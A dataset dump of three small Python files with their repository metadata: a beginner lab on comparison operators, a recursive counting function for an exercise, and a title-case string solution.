f95d1e51671bce45841f7e3915d266738a858b88 | 1a96e184d7f1eb3deba0aac6b622625d7ec92ac7 | /Other labs/ОП/Lab02/Lab02.5.py | 09c73252043db58a74e92af5c957f7941f99ed7f | [] | no_license | SmokyTail/OldProjects | 30514000307295c28d2ae108e474e8c80460afdc | cc5dbab62f775c576ca620d4b3b662877c5d135e | refs/heads/main | 2023-08-31T06:29:08.139152 | 2021-10-19T11:20:41 | 2021-10-19T11:20:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | is_equal = 0
a = 1
b = 2
c = 2
is_equal = b == a
print(is_equal)
is_equal = c == b
print(is_equal)
one = 1
two = 2
three = 3
print(one < two < three)
print(one > three < two)
print(one < three <= two)
print(one >= two < three) | [
"Pasha-Love-comp@mail.ru"
] | Pasha-Love-comp@mail.ru |
c30e22ee2d9981b49022661bd8c8de23908ce27e | 78d7d7aeb78a8cea6d0e10b89fc4aa6c46c95227 | /448.py | d69d285b5d87d18b1e029474dd35d050e1364dcc | [] | no_license | GenryEden/kpolyakovName | 97db13ef93061a8c2afc6cc5acd91337f79063f1 | c5d7f631ae7ec8770e56170574b82ea2b7d8a4d9 | refs/heads/master | 2023-05-23T21:22:51.983756 | 2021-06-21T08:56:49 | 2021-06-21T08:56:49 | 350,466,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | def f(x):
if x < 1:
return 0
elif x == 1:
return 1
else:
ans = f(x-1)
if x - 1 != 7:
ans += f(x-2)
return ans
print(f(12)) | [
"a926788@gmail.com"
] | a926788@gmail.com |
b027ecd4e3f1bf2b9f6306f3f245f5517fc82dcd | 4c267bf6ab68d38d65b32c7decd77f4d448d6554 | /Basic Algorithm Scripting Challenges/title-case-sentence.py | 76e664af1e4aa17e075369c3950df31c2e875cb6 | [] | no_license | danieltapp/fcc-python-solutions | 06199671d3e010c20e30d32bc998c5d2c0c6cbcf | a2b0c644d54688120ed3c7b05a2500d19b31b010 | refs/heads/master | 2020-03-17T21:35:50.504329 | 2018-05-23T18:28:24 | 2018-05-23T18:28:24 | 133,965,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | import string
#Return the provided string with the first letter of each word capitalized. Make sure the rest of the word is in lower case.
def title_case(str):
return string.capwords(str)
print(title_case("I'm a little tea pot"))
print(title_case('sHoRt AnD sToUt'))
print(title_case('HERE IS MY HANDLE HERE IS MY SPOUT'))
print(title_case('fart knocker'))
| [
"danieltapp@gmail.com"
] | danieltapp@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.